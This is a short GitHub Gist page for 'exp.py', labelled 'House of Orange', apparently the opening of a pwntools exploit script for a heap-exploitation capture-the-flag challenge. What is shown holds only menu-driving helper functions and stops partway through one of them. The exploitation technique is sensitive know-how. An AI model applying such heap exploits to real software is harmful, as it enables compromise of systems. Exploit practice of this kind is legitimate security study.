Skip to content

Instantly share code, notes, and snippets.

@st4nw
st4nw / exp.py
Last active March 28, 2019 10:51
House of Orange
from pwn import *
def menu(opt):
p.recvuntil('choice : ')
p.send(str(opt))
def alloc(size, name, price):
p.recvuntil('name :')
p.send(str(size))
p.recvuntil('Name')